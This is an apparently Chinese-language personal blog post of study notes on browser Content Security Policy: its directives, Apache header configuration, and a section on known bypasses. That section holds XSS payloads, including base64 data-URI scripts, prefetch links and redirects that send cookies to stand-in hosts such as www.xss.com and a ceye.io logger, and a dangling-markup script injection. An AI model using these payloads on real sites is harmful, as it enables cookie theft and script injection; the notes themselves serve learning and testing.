<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="浏览器安全策略," />










<meta name="description" content="内容安全策略 CSP百度百科概念：  CSP指的是内容安全策略，为了缓解很大一部分潜在的跨站脚本问题，浏览器的扩展程序系统引入了内容安全策略（CSP）的一般概念。这将引入一些相当严格的策略，会使扩展程序在默认情况下更加安全，开发者可以创建并强制应用一些规则，管理网站允许加载的内容 直白的说就是通过该浏览器扩展 进行 加载资源脚本的黑白名单限制；实现和执行均由浏览器完成 功能效果主要用来防注入脚本（">
<meta name="keywords" content="浏览器安全策略">
<meta property="og:type" content="article">
<meta property="og:title" content="安全策略-csp理解与学习">
<meta property="og:url" content="http://yoursite.com/2019/01/10/安全策略/csp/index.html">
<meta property="og:site_name" content="吾善养浩然气">
<meta property="og:description" content="内容安全策略 CSP百度百科概念：  CSP指的是内容安全策略，为了缓解很大一部分潜在的跨站脚本问题，浏览器的扩展程序系统引入了内容安全策略（CSP）的一般概念。这将引入一些相当严格的策略，会使扩展程序在默认情况下更加安全，开发者可以创建并强制应用一些规则，管理网站允许加载的内容 直白的说就是通过该浏览器扩展 进行 加载资源脚本的黑白名单限制；实现和执行均由浏览器完成 功能效果主要用来防注入脚本（">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2019-07-21T04:44:08.691Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="安全策略-csp理解与学习">
<meta name="twitter:description" content="内容安全策略 CSP百度百科概念：  CSP指的是内容安全策略，为了缓解很大一部分潜在的跨站脚本问题，浏览器的扩展程序系统引入了内容安全策略（CSP）的一般概念。这将引入一些相当严格的策略，会使扩展程序在默认情况下更加安全，开发者可以创建并强制应用一些规则，管理网站允许加载的内容 直白的说就是通过该浏览器扩展 进行 加载资源脚本的黑白名单限制；实现和执行均由浏览器完成 功能效果主要用来防注入脚本（">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/01/10/安全策略/csp/"/>





  <title>安全策略-csp理解与学习 | 吾善养浩然气</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">吾善养浩然气</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-主页">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            主页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-关于">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-标签">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-分类">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-归档">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/01/10/安全策略/csp/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="blackj liuyun">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="吾善养浩然气">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">安全策略-csp理解与学习</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-01-10T02:11:33+08:00">
                2019-01-10
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/浏览器安全策略/" itemprop="url" rel="index">
                    <span itemprop="name">浏览器安全策略</span>
                  </a>
                </span>

                
                
                  ， 
                
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/浏览器安全策略/csp/" itemprop="url" rel="index">
                    <span itemprop="name">csp</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  3k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  12
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="内容安全策略-CSP"><a href="#内容安全策略-CSP" class="headerlink" title="内容安全策略 CSP"></a>内容安全策略 CSP</h1><p>百度百科概念： </p>
<p>CSP指的是内容安全策略，为了缓解很大一部分潜在的跨站脚本问题，浏览器的扩展程序系统引入了内容安全策略（CSP）的一般概念。这将引入一些相当严格的策略，会使扩展程序在默认情况下更加安全，开发者可以创建并强制应用一些规则，管理网站允许加载的内容</p>
<p>直白的说就是通过该浏览器扩展 进行 加载资源脚本的黑白名单限制；实现和执行均由浏览器完成</p>
<h4 id="功能效果"><a href="#功能效果" class="headerlink" title="功能效果"></a>功能效果</h4><p>主要用来防注入脚本（比如 xss 加载其他域下的js；广告注入h5页面、运营商的http劫持）图片、iframe、fton、style等等可能的远程的资源</p>
<ul>
<li>限制远程资源的请求，如通过远程请求将资源如cookie传送出去</li>
<li>记录违规的限制行为，并汇报给指定目标。</li>
</ul>
<h5 id="CSP和同源策略"><a href="#CSP和同源策略" class="headerlink" title="CSP和同源策略"></a>CSP和同源策略</h5><p>在同源策略中 一个页面的资源只能从与之同源的服务器获取，不能从其他域获取；但因此也影响了灵活性，CSP相对来说 可以跨域获取资源，又能防止恶意代码。</p>
<h5 id="使用方式："><a href="#使用方式：" class="headerlink" title="使用方式："></a>使用方式：</h5><h6 id="要素"><a href="#要素" class="headerlink" title="要素"></a>要素</h6><p>CSP域：允许使用CSP的规则</p>
<p>CSP指令集：允许白名单的内容规则<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">示例</span><br><span class="line"></span><br><span class="line">default-src &apos;self&apos;;   </span><br><span class="line"></span><br><span class="line">只允许同源下的资源</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">script-src &apos;self&apos;;     </span><br><span class="line"></span><br><span class="line">只允许同源下的js</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">script-src &apos;self&apos; www.google-analytics.com ajax.googleapis.com;</span><br><span class="line"></span><br><span class="line">允许同源以及两个地址下的js加载</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">default-src &apos;none&apos;; script-src &apos;self&apos;; connect-src &apos;self&apos;; img-src &apos;self&apos;; style-src &apos;self&apos;;</span><br><span class="line"></span><br><span class="line">多个资源时,后面的会覆盖前面的</span><br></pre></td></tr></table></figure></p>
<ul>
<li>常见csp策略</li>
</ul>
<table>
<thead>
<tr>
<th>指令</th>
<th>指令和指令值示例</th>
<th>指令说明 </th>
</tr>
</thead>
<tbody>
<tr>
<td>default-src</td>
<td>‘self’ cdn.guangzhul.com</td>
<td>默认加载策略</td>
</tr>
<tr>
<td>script-src</td>
<td>‘self’ js.guangzhul.com</td>
<td>对 JavaScript 的加载策略。</td>
</tr>
<tr>
<td>style-src</td>
<td>‘self’ css.guangzhul.com</td>
<td>对样式的加载策略。</td>
</tr>
<tr>
<td>img-src</td>
<td>‘self’ img.guangzhul.com</td>
<td>对图片的加载策略。</td>
</tr>
<tr>
<td>connect-src</td>
<td>‘self’</td>
<td>对 Ajax、WebSocket 等请求的加载策略。不允许的情况下，浏览器会模拟一个状态为 400 的响应。</td>
</tr>
<tr>
<td>font-src</td>
<td>font.cdn.guangzhul.com</td>
<td>针对 WebFont 的加载策略。</td>
</tr>
<tr>
<td>object-src</td>
<td>‘self’</td>
<td>针对 、 或 等标签引入的 flash 等插件的加载策略。</td>
</tr>
<tr>
<td>media-src</td>
<td>media.cdn.guangzhul.com</td>
<td>针对媒体引入的 HTML 多媒体的加载策略。</td>
</tr>
<tr>
<td>frame-src</td>
<td>‘self’</td>
<td>针对 frame 的加载策略。</td>
</tr>
<tr>
<td>report-uri</td>
<td>/report-uri</td>
<td>告诉浏览器如果请求的资源不被策略允许时，往哪个地址提交日志信息。 特别的：如果想让浏览器只汇报日志，不阻止任何内容，可以改用 Content-Security-Policy-Report-Only 头。</td>
</tr>
</tbody>
</table>
<ul>
<li>其他CSP指令</li>
</ul>
<table>
<thead>
<tr>
<th>指令</th>
<th>指令和指令值示例</th>
<th>指令说明 </th>
</tr>
</thead>
<tbody>
<tr>
<td>sandbox</td>
<td></td>
<td>设置沙盒环境</td>
</tr>
<tr>
<td>child-src</td>
<td></td>
<td>主要防御 <frame>,<iframe></iframe></td>
</tr>
<tr>
<td>form-action</td>
<td></td>
<td>主要防御 <form></form></td>
</tr>
<tr>
<td>frame-ancestors</td>
<td></td>
<td>主要防御 <frame>,<iframe>,<object>,<embed>,<applet></applet></object></iframe></td>
</tr>
<tr>
<td>plugin-types</td>
<td></td>
<td>主要防御 <object>,<embed>,<applet></applet></object></td>
</tr>
</tbody>
</table>
<ul>
<li>常见指令值</li>
</ul>
<table>
<thead>
<tr>
<th>指令值</th>
<th>指令和指令值示例</th>
<th>指令值说明</th>
</tr>
</thead>
<tbody>
<tr>
<td>*</td>
<td>img-src *</td>
<td>允许任何内容。</td>
</tr>
<tr>
<td>‘none’</td>
<td>img-src ‘none’</td>
<td>不允许任何内容。</td>
</tr>
<tr>
<td>‘self’</td>
<td>img-src ‘self’</td>
<td>允许来自相同来源的内容（相同的协议、域名和端口）。</td>
</tr>
<tr>
<td>data:</td>
<td>img-src data:</td>
<td>允许 data: 协议（如 base64 编码的图片）。</td>
</tr>
<tr>
<td><a href="http://www.guangzhul.com" target="_blank" rel="noopener">www.guangzhul.com</a></td>
<td>img-src</td>
<td>img.guangzhul.com    允许加载指定域名的资源。</td>
</tr>
<tr>
<td>*.guangzhul.com</td>
<td>img-src *.guangzhul.com    允许加载 guangzhul.com</td>
<td>任何子域的资源。</td>
</tr>
<tr>
<td>‘unsafe-inline’</td>
<td>script-src ‘unsafe-inline’</td>
<td>允许加载 inline 资源（例如常见的 style 属性，onclick，inline js 和 inline css 等等）。</td>
</tr>
<tr>
<td>‘unsafe-eval’</td>
<td>script-src ‘unsafe-eval’</td>
<td>允许加载动态 js 代码，例如 eval()。</td>
</tr>
</tbody>
</table>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">限制所有的外部资源，都只能从当前域名加载</span><br><span class="line">Content-Security-Policy: default-src &apos;self&apos;</span><br></pre></td></tr></table></figure>
<p>可以由http header和html来指定,启用后，不符合 CSP 的外部资源就会被阻止加载。</p>
<h5 id="http-header"><a href="#http-header" class="headerlink" title="http header"></a>http header</h5><p>在服务端的响应包的header中展示 内容均来自于应用自己域，不涉及子域<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Content-Security-Policy:default-src&apos;self&apos;</span><br></pre></td></tr></table></figure></p>
<h5 id="html中通过meta来限制"><a href="#html中通过meta来限制" class="headerlink" title="html中通过meta来限制"></a>html中通过meta来限制</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;meta http-equiv=&quot;Content-Security-Policy&quot; content=&quot;script-src &apos;self&apos;; object-src &apos;none&apos;; style-src cdn.example.org third-party.org; child-src https:&quot;&gt;</span><br></pre></td></tr></table></figure>
<h4 id="构建一下csp-来个例子"><a href="#构建一下csp-来个例子" class="headerlink" title="构建一下csp 来个例子"></a>构建一下csp 来个例子</h4><h5 id="配置"><a href="#配置" class="headerlink" title="配置"></a>配置</h5><p>首先要在配置文件中加载mod_headers.so模块，<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo  a2enmod headers</span><br></pre></td></tr></table></figure></p>
<p>在对应的配置文件中，我用的apache2.conf进行配置</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">LoadModule headers_module modules/mod_headers.so</span><br></pre></td></tr></table></figure>
<p>然后可以添加相关规则<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Header set Content-Security-Policy &quot;default-src &apos;self&apos;;&quot;</span><br></pre></td></tr></table></figure></p>
<h5 id="常见绕过方式"><a href="#常见绕过方式" class="headerlink" title="常见绕过方式"></a>常见绕过方式</h5><h6 id="1-文件上传绕过-只允许加载当前域"><a href="#1-文件上传绕过-只允许加载当前域" class="headerlink" title="1 文件上传绕过  只允许加载当前域"></a>1 文件上传绕过  只允许加载当前域</h6><p>最常见规则如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">header(&quot;Content-Security-Policy: default-src &apos;self&apos;; script-src &apos;self&apos; &quot;);</span><br></pre></td></tr></table></figure></p>
<p>针对这种方式，通常使用方法是 找一个文件上传点，上传一个文件内容为js的图片<br>说到这里 注意一下，浏览器对一个文件做解析/下载 处理的,并不是文件的后缀名<br>而是服务器返回的mimeType,如果在服务端没有定义的类型，即通俗的mimes.type中没有定义，即没有返回content-type<br>则在apache服务器中会默认以html格式解析（在nginx服务器中会以octet-stream，直接下载，这里可以使用svg后缀触发svg标签。条件允许的话），所以在遇到上传黑名单的时候，可以试试xx类似的。</p>
<p>测试过程中 一来就折戟沉沙，头大，使用 该规则后，简单测试 xx文件后缀，直接嵌入script标签，<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(1)&lt;/script&gt;</span><br></pre></td></tr></table></figure></p>
<p>竟然没用，一顿瞎操作后才确定，是因为制定了csp规则的问题。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">script-src &apos;self&apos;; 或者 default-src &apos;self&apos;</span><br></pre></td></tr></table></figure></p>
<p>要允许内联的js执行，即添加 “unsafe-inline”</p>
<ul>
<li>不允许内联时 测试的时候直接alert是没法触发的，所以在常规渗透测试的时候要注意，这个时候用 script src 这类引用是可以的，引用上传的同域js 执行。</li>
</ul>
<p>使用下列js伪协议的payload可以绕过safari（ 12.0.2 ）的csp检测，chrome和firefox不行，猜测可能跟csp检测顺序阶段有关（待深入讨论）。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;object data=&quot;data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==&quot;&gt;&lt;/object&gt;</span><br><span class="line"></span><br><span class="line">&lt;a href=&quot;data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg==&quot; &gt;test&lt;/a&gt;</span><br><span class="line"></span><br><span class="line">&lt;iframe src=&quot;data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==&quot;&gt;</span><br><span class="line"></span><br><span class="line">Bypass CSP by @akita_zen</span><br><span class="line"></span><br><span class="line">Works for CSP like script-src self</span><br></pre></td></tr></table></figure></p>
<ul>
<li>允许内联时</li>
</ul>
<p>可以正常输入输出测试</p>
<h6 id="2、预加载-标签rel属性-绕过只允许加载当前域"><a href="#2、预加载-标签rel属性-绕过只允许加载当前域" class="headerlink" title="2、预加载 标签rel属性 绕过只允许加载当前域"></a>2、预加载 <link>标签rel属性 绕过只允许加载当前域</h6><p>谈到这个问题就不得不说一下浏览器的预加载/预读取</p>
<ul>
<li>2.1 预加载</li>
</ul>
<p>预加载：目的和js压缩、cdn等类似都是优化浏览器请求时加快请求速度，让浏览器在空闲时间下载或读取资源，用户在将来将会访问这些资源。一个Web页面可以对浏览器设置一系列的预加载指示，当浏览器加载完当前页面后，它会在后台静悄悄的加载指定的文档，并把它们存储在缓存里。当用户访问到这些预加载的文档后，浏览器能快速的从缓存里提取给用户。（来自MDN的解释）</p>
<ul>
<li>2.1.1 预加载例子</li>
</ul>
<p>【1】prefetch 预加载资源-旧版chrome可用</p>
<p>实现方法： 通过link实现，将rel属性指定为“prefetch”，在href中指定加载资源的地址。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;!-- 预加载整个页面 --&gt;</span><br><span class="line">&lt;link rel=&quot;prefetch&quot; href=&quot;http://www.webhek.com/misc/3d-album/&quot; /&gt;</span><br><span class="line"></span><br><span class="line">&lt;!-- 预加载一个图片 --&gt;</span><br><span class="line">&lt;link rel=&quot;prefetch&quot; href=&quot; http://www.webhek.com/wordpress/</span><br><span class="line">wp-content/uploads/2014/04/b-334x193.jpg &quot; /&gt;</span><br></pre></td></tr></table></figure>
<p>【2】prerender chrome预渲染-可用</p>
<p>对对应地址所有资源进行渲染<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;link rel=&quot;prerender&quot; href=&quot;http://linux.im&quot;&gt;</span><br></pre></td></tr></table></figure></p>
<p>【3】dns-prefetch DNS预解析-可用</p>
<p>故名思意，DNS预解析 提前将分析页面所需资源域名进行ip转换，使之在请求时尽快完成DNS解析。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;link rel=&quot;dns-prefetch&quot; href=&quot;http://linux.im&quot;&gt;</span><br></pre></td></tr></table></figure></p>
<p>【4】除此之外还有Preconnect(-可用 类似于dns-prefetch，同时会完成握手机制)、subresource、preload<br>这里接触不多，就不一一多提了。</p>
<ul>
<li>2.1.2 预加载的绕过</li>
</ul>
<p>回到我们的重点，预加载针对的CSP绕过规则<br>在限制了资源请求时，在xss中想要把cookie传送出去</p>
<p>限制如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">header(&quot;Content-Security-Policy: default-src &apos;self&apos;; script-src &apos;self&apos; &quot;);</span><br></pre></td></tr></table></figure></p>
<p>限制了不可信资源的请求，且不允许内联执行这个时候就可以用预加载方式进行绕过 传出需要的数据<br>如：</p>
<p>【1】 dns-prefetch<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;link rel=&quot;dns-prefetch&quot; href=&quot;http://1221.xxxx.ceye.io&quot;&gt;</span><br></pre></td></tr></table></figure></p>
<p>这个时候就可以在ceye上查看相关dns请求记录</p>
<p>【2】prefetch<br>在Chrome下，可以使用如下标签发送cookie（最新版Chrome会禁止）<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;link rel=&quot;prefetch&quot; href=&quot;http://1221.xxxx.ceye.io&quot;&gt;</span><br></pre></td></tr></table></figure></p>
<p>【3】Preconnect、prerender 均测可用，其他的暂未测试。</p>
<p>以下也尚未测试 尴尬 仅摘抄，先写到这吧</p>
<h6 id="3-url跳转"><a href="#3-url跳转" class="headerlink" title="3 url跳转"></a>3 url跳转</h6><p>在规则限制为 default-src ‘none’的情况下，此时策略为 默认策略 禁止所有资源（不允许加载所有内容）</p>
<p>可以使用meta标签实现跳转<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;meta http-equiv=&quot;refresh&quot; content=&quot;1;url=http://www.xss.com/x.php?c=[cookie]&quot; &gt;</span><br></pre></td></tr></table></figure></p>
<p>在允许unsafe-inline的情况下，可以用window.location，或者window.open之类的方法进行跳转绕过。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line">  window.location=&quot;http://www.xss.com/x.php?c=[cookie]&quot;;</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure></p>
<h6 id="4-利用浏览器补全"><a href="#4-利用浏览器补全" class="headerlink" title="4 利用浏览器补全"></a>4 利用浏览器补全</h6><p>有些网站限制只有某些脚本才能使用，往往会使用<script>标签的nonce属性，只有nonce一致的脚本才生效，比如CSP设置成下面这样：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Content-Security-Policy: default-src &apos;none&apos;;script-src &apos;nonce-abc&apos;</span><br></pre></td></tr></table></figure></p>
<p>那么当脚本插入点为如下的情况时</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;p&gt;插入点&lt;/p&gt;</span><br><span class="line">&lt;script id=&quot;aa&quot; nonce=&quot;abc&quot;&gt;document.write(&apos;CSP&apos;);&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<p>可以插入<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;script src=//14.rs a=&quot;</span><br><span class="line"></span><br><span class="line">这样会拼成一个新的script标签，其中的src可以自由设定</span><br><span class="line">&lt;p&gt;&lt;script src=//14.rs a=&quot;&lt;/p&gt;</span><br><span class="line">&lt;script id=&quot;aa&quot; nonce=&quot;abc&quot;&gt;document.write(&apos;CSP&apos;);&lt;/script&gt;</span><br></pre></td></tr></table></figure></p>
<h6 id="5-代码重用"><a href="#5-代码重用" class="headerlink" title="5 代码重用"></a>5 代码重用</h6><p>Blackhat2017上有篇ppt总结了可以被用来绕过CSP的一些JS库。<br>例如假设页面中使用了Jquery-mobile库，并且CSP策略中包含”script-src ‘unsafe-eval’”或者”script-src ‘strict-dynamic’”，那么下面的向量就可以绕过CSP：</p>
<div data-role=popup id='<script>alert(1)</script>'>

</p><p>在这个PPT之外的还有一些库也可以被利用，例如RCTF2018中遇到的amp库，下面的标签可以获取名字为FLAG的cookie</p>
<p><amp-pixel src="http://your domain/?cid=CLIENT_ID(FLAG)"></amp-pixel>  </p>
<h6 id="iframe"><a href="#iframe" class="headerlink" title="iframe"></a>iframe</h6><p>1.如果页面A中有CSP限制，但是页面B中没有，同时A和B同源，那么就可以在A页面中包含B页面来绕过CSP：</p>
<iframe src="B"></iframe>

<p>2.在Chrome下，iframe标签支持csp属性，这有时候可以用来绕过一些防御，例如”<a href="http://xxx&quot;页面有个js库会过滤XSS向量，我们就可以使用csp属性来禁掉这个js库。" target="_blank" rel="noopener">http://xxx&quot;页面有个js库会过滤XSS向量，我们就可以使用csp属性来禁掉这个js库。</a></p>
<iframe csp="script-src 'unsafe-inline'" src="http://xxx"></iframe>

<h6 id="meta标签"><a href="#meta标签" class="headerlink" title="meta标签"></a>meta标签</h6><p>meta标签有一些不常用的功能有时候有奇效：<br>meta可以控制缓存（在header没有设置的情况下），有时候可以用来绕过CSP nonce。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;meta http-equiv=&quot;cache-control&quot; content=&quot;public&quot;&gt;</span><br><span class="line"></span><br><span class="line">meta可以设置Cookie（Firefox下），可以结合self-xss利用。</span><br><span class="line">&lt;meta http-equiv=&quot;Set-Cookie&quot; Content=&quot;cookievalue=xxx;expires=Wednesday,21-Oct-98 16:14:21 GMT; path=/&quot;&gt;</span><br></pre></td></tr></table></figure></p>
<h5 id="默认特性"><a href="#默认特性" class="headerlink" title="默认特性"></a>默认特性</h5><ul>
<li>阻止内联代码的执行</li>
<li>eval 相关功能被禁用</li>
</ul>
<h5 id="防护问题："><a href="#防护问题：" class="headerlink" title="防护问题："></a>防护问题：</h5><h5 id="参考："><a href="#参考：" class="headerlink" title="参考："></a>参考：</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">http://www.ruanyifeng.com/blog/2016/09/csp.html</span><br><span class="line">https://blog.csdn.net/qq_37943295/article/details/79978761</span><br><span class="line">https://paper.seebug.org/423/</span><br><span class="line">https://xz.aliyun.com/t/318</span><br><span class="line">https://paper.seebug.org/91/</span><br><span class="line">http://www.webhek.com/post/link-prefetch.html</span><br></pre></td></tr></table></figure>
<h5 id="存疑"><a href="#存疑" class="headerlink" title="存疑"></a>存疑</h5><p>【1】内联js的定义 <script src=""></script>属于内联还是外联<br>（通俗的来说 内联 即属于script标签内直接调用，外联属于调用外部js）</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/浏览器安全策略/" rel="tag"># 浏览器安全策略</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/01/01/2019/" rel="next" title="2019">
                <i class="fa fa-chevron-left"></i> 2019
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/01/22/移动端/frida1/" rel="prev" title="frida理解与学习">
                frida理解与学习 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
